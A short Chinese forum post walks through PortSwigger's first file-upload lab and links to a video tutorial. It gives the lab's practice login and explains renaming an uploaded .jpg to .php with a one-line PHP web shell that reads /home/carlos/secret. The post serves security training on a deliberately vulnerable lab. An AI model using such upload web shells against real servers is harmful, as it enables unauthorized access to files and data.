Portswigger 文件上传漏洞 视频教学
第一关 上传一个webshell本实验室包含易受测试的图片上传功能。在将用户上传的文件存储在服务器的文件系统之前,它不会对它们执行任何验证。
为了解决这个实验,上传一个基本的 PHP web shell 并使用它来泄露/home/carlos/secret文件的内容。使用实验室横幅中提供的按钮提交此密钥。
您可以使用以下凭据登录到您自己的帐户:wiener:peter
思路
上传一个图片,将后缀名`jpg`改为`php`
修改图片的内容为
<?php
echo file_get_contents('/home/carlos/secret');
?>
https://blog.bbskali.cn/usr/uploads/2022/07/2646978294.mp4
页:
[1]